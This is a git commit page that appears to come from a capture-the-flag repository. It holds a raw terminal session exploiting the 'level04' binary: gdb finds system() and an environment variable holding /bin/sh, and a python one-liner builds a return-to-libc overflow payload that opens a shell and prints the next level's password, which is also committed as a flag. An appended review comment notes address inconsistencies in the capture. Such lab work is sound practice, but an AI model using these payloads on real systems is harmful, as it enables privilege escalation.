feat: level04 + level05 elf

gbrochar 2025-05-12 16:44:04 +02:00
parent dfb81e7718
commit 74a1506332
3 changed files with 73 additions and 0 deletions


@ -0,0 +1,72 @@
level04@OverRide:~$ export EGG=" /bin/sh"
level04@OverRide:~$ gdb level04
bGNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /home/users/level04/level04...(no debugging symbols found)...done.
(gdb) b main+150
Function "main+150" not defined.
Make breakpoint pending on future shared library load? (y or [n]) ^Cn
(gdb) Quit
(gdb) b *main+150
Breakpoint 1 at 0x804875e
(gdb) set follow-fork-mode child
(gdb) run
Starting program: /home/users/level04/level04
[New process 1813]
Give me some shellcode, k
[Switching to process 1813]
Breakpoint 1, 0x0804875e in main ()
(gdb) p system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>
(gdb) p (char *)getenv("EGG")
$2 = 0xffffd857 ' ' <repeats 200 times>...
(gdb) exit
Undefined command: "exit". Try "help".
(gdb) quit
A debugging session is active.
Inferior 2 [process 1813] will be killed.
Quit anyway? (y or n) y
child is exiting...
level04@OverRide:~$ env
TERM=xterm-256color
SHELL=/bin/bash
SSH_CLIENT=10.0.2.2 59932 4242
OLDPWD=/home/users/level04
SSH_TTY=/dev/pts/0
EGG= /bin/sh
USER=level04
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.dz=01;31:*.gz=01;31:*.lz=01;31:*.xz=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:
MAIL=/var/mail/level04
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games
PWD=/home/users/level04
LANG=en_US.UTF-8
SHLVL=1
HOME=/home/users/level04
LANGUAGE=en_US:en
LOGNAME=level04
SSH_CONNECTION=10.0.2.2 59932 10.0.2.15 4242
LESSOPEN=| /usr/bin/lesspipe %s
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env
level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt
-bash: exploit.txt: Permission denied
level04@OverRide:~$ chmod +w .
level04@OverRide:~$ python -c "print('A'*156+'\xd0\xae\xe6\xf7'+' '+'\xa0\xd8\xff\xff')" > exploit.txt
level04@OverRide:~$ cat exploit.txt - | ./level04
Give me some shellcode, k
whoami
level05
cat /home/users/level05/.pass
3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN
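Review bot: This walkthrough is a raw terminal capture with no explanation, and two things in it cannot be reconciled from the text alone: the `export EGG=" /bin/sh"` and `env` lines show a single leading space while gdb reports `' ' <repeats 200 times>`, and the pointer in the python line (`\xa0\xd8\xff\xff`) is not the `0xffffd857` that gdb printed. A short header would fix that, for example `# EGG is padded with leading spaces; the pointer used below lands inside that padding because the environment sits at a different address outside gdb`, which is my reading of the session and should be confirmed by the author. The hard-coded `system` and stack addresses presumably hold only on this VM, which is worth stating as well. I would also drop the mistyped commands (`b main+150`, `exit`, the first redirect that fails) and write `exploit.txt` to a temporary directory instead of running `chmod +w .`, which leaves the home directory writable afterwards.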

1
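--- a/level04/flag
+++ b/level04/flag
@@ -0,0 +1 @@
+3v8QLcN5SAhPaZZfEasfmXdwyR59ktDEMAwHF3aN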

BIN
level05/Ressources/level05 Executable file

Binary file not shown.